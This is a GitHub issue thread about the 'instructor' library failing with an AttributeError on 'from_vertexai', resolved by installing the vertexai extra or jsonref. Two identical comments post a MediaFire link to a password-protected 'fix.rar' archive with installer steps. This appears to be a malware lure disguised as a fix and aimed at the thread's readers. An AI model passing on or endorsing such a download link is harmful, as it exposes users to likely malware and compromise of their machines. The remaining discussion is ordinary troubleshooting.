### ISSUE TITLE
AttributeError: module 'instructor' has no attribute 'from_vertexai'

### ISSUE THREAD

**Issue by Filimoa** [jxnl/instructor#959]
**Is your feature request related to a problem? Please describe.**

Running the following example from the [docs](https://python.useinstructor.com/#vertex-ai) fails 

```py
import instructor
import vertexai  # type: ignore
from vertexai.generative_models import GenerativeModel  # type: ignore
from pydantic import BaseModel

vertexai.init()


class User(BaseModel):
    name: str
    age: int


client = instructor.from_vertexai(
    client=GenerativeModel("gemini-1.5-pro-preview-0409"),
    mode=instructor.Mode.VERTEXAI_TOOLS,
)

# note that client.chat.completions.create will also work
resp = client.create(
    messages=[
        {
            "role": "user",
            "content": "Extract Jason is 25 years old.",
        }
    ],
    response_model=User,
)

assert isinstance(resp, User)
assert resp.name == "Jason"
assert resp.age == 25
```
with 
```
---> 15 client = instructor.from_vertexai(
     16     client=GenerativeModel("gemini-1.5-flash"),
     17     mode=instructor.Mode.VERTEXAI_TOOLS,

AttributeError: module 'instructor' has no attribute 'from_vertexai'
```

**Describe the solution you'd like**
It'd be helpful if the docs clarified that you need to have the vertex add-on installed. Maybe a callout? I imagine many people google "gemini + instructor", get sent to this page and get confused when this fails with a very strange error.

Not sure if this is just vertex or other packages too.

```
pip install instructor[vertexai]
```

**Describe alternatives you've considered**
The more robust solution would be to add a skeleton function to act as a stand in.

Something like

```
---> 15 client = instructor.from_vertexai(
     16     client=GenerativeModel("gemini-1.5-flash"),
     17     mode=instructor.Mode.VERTEXAI_TOOLS,

ImportError: The 'from_vertexai' function requires the Vertex AI add-on. 
Please install it with 'pip install instructor[vertexai]'.
```

This would be kind of annoying to implement while maintaining type checking.  I'm open to contributing a PR.

**Additional context**
n/a

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ivanleomk** [comment]
@Filimoa what version of instructor are you using? we introduced these `from_xx` methods from v1.x onwards.

**Comment by Filimoa** [comment]
This is exactly why I was confused - I'm on the latest version `1.4`

**Comment by suki-fahmad** [comment]
Facing the same issue. I'm on version `1.4.0`.

**Comment by ashtianicode** [comment]
Same here, on `instructor = "1.4.0"`

**Comment by levi-katarok** [comment]
I also found it was because the conditional import means that from_vertexai will only be imported and added to the module's __all__ list if both the vertexai and jsonref packages are installed and can be found by Python.

I manually installed jsonref and it worked. 

`pip install jsonref`
